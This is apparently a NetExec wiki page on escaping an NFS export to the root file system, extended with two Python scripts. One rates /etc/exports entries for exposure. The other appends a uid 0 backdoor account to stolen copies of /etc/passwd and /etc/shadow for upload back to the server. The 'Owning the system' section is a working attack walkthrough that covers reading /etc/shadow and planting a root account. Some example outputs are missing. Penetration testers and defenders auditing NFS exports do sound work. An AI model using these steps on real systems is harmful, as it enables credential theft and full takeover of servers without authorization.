Escape to root file system
By default, NFS does not prevent a client from accessing files outside the exported directory: all the client needs is a valid file handle for the target. The file handle of the file system root (/) is not random; it has a static value that depends only on the file system type. Unless a share restricts accepted handles to the exported directory with the "subtree_check" option (which is not the default), a client can therefore present the root handle and walk from there to every single file on that file system.
NetExec automatically checks for this "escape to root" when it connects and reports it with a flag in the connection output:
Because the NFS client chooses the uid and gid it presents to the server, the escape lets you read every file that some non-root user or group is allowed to read; while "root_squash" is in effect, only files that nobody except root can read stay out of reach. A prominent example is /etc/shadow, which is owned by root:shadow and readable by the shadow group, so presenting the shadow gid is enough to fetch it. If the export additionally sets "no_root_squash", the server honours uid 0 and root-only files can be read as well. Combined with the "rw" flag, anyone can then upload and overwrite arbitrary files on the system and simply add themselves as a user.
Recommendation: The file /etc/exports defines every exported directory together with its options and is world readable. If you find a host where the root escape is possible, download that file first and check which options apply to you: "subtree_check" decides whether the escape works at all, "no_root_squash" whether uid 0 is honoured, "all_squash" whether your chosen uid/gid is honoured, and "rw" whether you can write. Note that "subtree_check" only matters when the exported directory is a subdirectory of a larger file system; an export that is its own mount point has nothing above it to escape to.
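As an added example (not part of the NetExec wiki or the NetExec code base), the following Python script parses the contents of a downloaded /etc/exports and rates each (path, client) pair for the conditions discussed above. The sample file contents are constructed; the default option values (ro, root_squash, no_subtree_check) are those documented in exports(5).

```python
"""Rate the entries of an /etc/exports file for NFS root-escape exposure (added example)."""
import re
from dataclasses import dataclass

# Constructed sample /etc/exports contents; not taken from any real host.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/srv/share    *(rw,sync,no_subtree_check,no_root_squash)
/home/backup  10.0.0.0/24(ro,sync,subtree_check)
/var/www      192.168.1.10(rw,sync) 192.168.1.0/24(ro,sync,all_squash)
/mnt/data     *
"""


@dataclass(frozen=True)
class Export:
    path: str
    client: str
    options: frozenset


@dataclass(frozen=True)
class Assessment:
    path: str
    client: str
    root_escape: bool          # handles outside the export are accepted (no subtree_check)
    root_files_readable: bool  # uid 0 is honoured (no_root_squash)
    uid_spoofing: bool         # client-chosen non-root uid/gid is honoured (no all_squash)
    writable: bool             # rw


# "client(opt,opt)" or a bare "client"; "(opts)" with no client means the world.
_CLIENT_RE = re.compile(r"([^(]*)(?:\((.*)\))?")


def parse_exports(text):
    """Parse exports(5) lines into one Export per (path, client) pair."""
    exports = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        # A path with no client list is exported to everyone with default options.
        path, clients = fields[0], fields[1:] or ["*"]
        for spec in clients:
            m = _CLIENT_RE.fullmatch(spec)
            client = m.group(1) or "*"
            opts = frozenset(o.strip() for o in (m.group(2) or "").split(",") if o.strip())
            exports.append(Export(path, client, opts))
    return exports


def assess(export):
    """Apply exports(5) defaults: ro, root_squash, no_subtree_check unless stated."""
    o = export.options
    return Assessment(
        path=export.path,
        client=export.client,
        root_escape="subtree_check" not in o,
        root_files_readable="no_root_squash" in o,
        uid_spoofing="all_squash" not in o,
        writable="rw" in o,
    )


def assess_exports(text):
    return [assess(e) for e in parse_exports(text)]


def escapable(text):
    """Return the (path, client) pairs from which the root handle is reachable."""
    return [(a.path, a.client) for a in assess_exports(text) if a.root_escape]


if __name__ == "__main__":
    for a in assess_exports(SAMPLE_EXPORTS):
        print(a)
```

Only the first entry in the sample gives the full (rw,no_root_squash) combination needed for the demo further down; /var/www is writable for one client but writes arrive as the anonymous user, and the all_squash entry defeats the shadow-group trick entirely.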
Leveraging the root escape
NetExec automatically uses the root escape when no share is specified in the command.
Example for --ls:
Owning the system: Demo
As mentioned above, when the options (rw,no_root_squash) are set, you can simply download the files /etc/shadow and /etc/passwd, add yourself as a uid 0 account and upload them again:
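As an added example (not NetExec's own code or part of the original page), the following Python script performs the "add yourself" step on local copies of the two files: it appends a uid 0 / gid 0 account to passwd and a matching shadow entry, and checks both files for field-count and passwd/shadow consistency before they are uploaded. The sample file contents and the password hashes are constructed placeholders; the hash passed in is assumed to come from a real crypt(3) generator such as `openssl passwd -6`.

```python
"""Append a uid 0 account to downloaded copies of /etc/passwd and /etc/shadow (added example)."""
import re
from datetime import date

# Constructed sample files; the hashes are placeholders, not real credentials.
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
)
SHADOW = (
    "root:$6$placeholder.salt$placeholder.hash:19500:0:99999:7:::\n"
    "daemon:*:19500:0:99999:7:::\n"
    "alice:$6$another.salt$another.hash:19500:0:99999:7:::\n"
)

_NAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
_HASH_RE = re.compile(r"^\$(1|5|6|y|2[aby])\$")  # crypt(3) hash prefixes (md5, sha256, sha512, yescrypt, bcrypt)


def records(text):
    """Split a colon-separated account file into lists of fields."""
    return [line.split(":") for line in text.splitlines() if line.strip()]


def days_since_epoch(today=None):
    """shadow(5) 'last changed' field: days since 1970-01-01."""
    return ((today or date.today()) - date(1970, 1, 1)).days


def add_root_user(passwd, shadow, name, password_hash, last_changed=None):
    """Return (passwd, shadow) with NAME appended as uid 0 / gid 0."""
    if not _NAME_RE.match(name):
        raise ValueError(f"invalid login name: {name!r}")
    if not _HASH_RE.match(password_hash):
        raise ValueError("password_hash must be a crypt(3) hash, e.g. from `openssl passwd -6`")
    if any(r[0] == name for r in records(passwd) + records(shadow)):
        raise ValueError(f"{name!r} already exists; pick another name")
    if last_changed is None:
        last_changed = days_since_epoch()
    # passwd(5): name:x:uid:gid:gecos:home:shell ('x' defers the hash to shadow)
    passwd_line = f"{name}:x:0:0:{name}:/root:/bin/bash\n"
    # shadow(5): name:hash:lastchg:min:max:warn:inactive:expire:reserved
    shadow_line = f"{name}:{password_hash}:{last_changed}:0:99999:7:::\n"
    # Keep both files newline-terminated so the new entry starts on its own line.
    if passwd and not passwd.endswith("\n"):
        passwd += "\n"
    if shadow and not shadow.endswith("\n"):
        shadow += "\n"
    return passwd + passwd_line, shadow + shadow_line


def check(passwd, shadow):
    """Sanity checks before uploading: field counts and passwd/shadow agreement."""
    problems = []
    p, s = records(passwd), records(shadow)
    for r in p:
        if len(r) != 7:
            problems.append(f"passwd: {r[0]} has {len(r)} fields")
    for r in s:
        if len(r) != 9:
            problems.append(f"shadow: {r[0]} has {len(r)} fields")
    missing = {r[0] for r in p if r[1] == "x"} - {r[0] for r in s}
    for n in sorted(missing):
        problems.append(f"shadow: no entry for {n}")
    return problems


def uid0_accounts(passwd):
    """Names of all accounts with uid 0; after the edit there should be two."""
    return [r[0] for r in records(passwd) if r[2] == "0"]


if __name__ == "__main__":
    # Placeholder hash; generate a real one with: openssl passwd -6 'YourPassword'
    new_passwd, new_shadow = add_root_user(PASSWD, SHADOW, "nxc", "$6$saltsalt$placeholderhash")
    print(new_passwd, new_shadow, check(new_passwd, new_shadow), uid0_accounts(new_passwd), sep="\n")
```

Write the two returned strings to local files and upload them over the share in place of /etc/passwd and /etc/shadow. Upload both or neither: a passwd entry whose "x" has no shadow counterpart cannot log in, which is exactly what check() flags. Remember that with "root_squash" still in effect the upload arrives as the anonymous user and fails on the root-owned originals, which is why the demo requires "no_root_squash".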
Additional sources: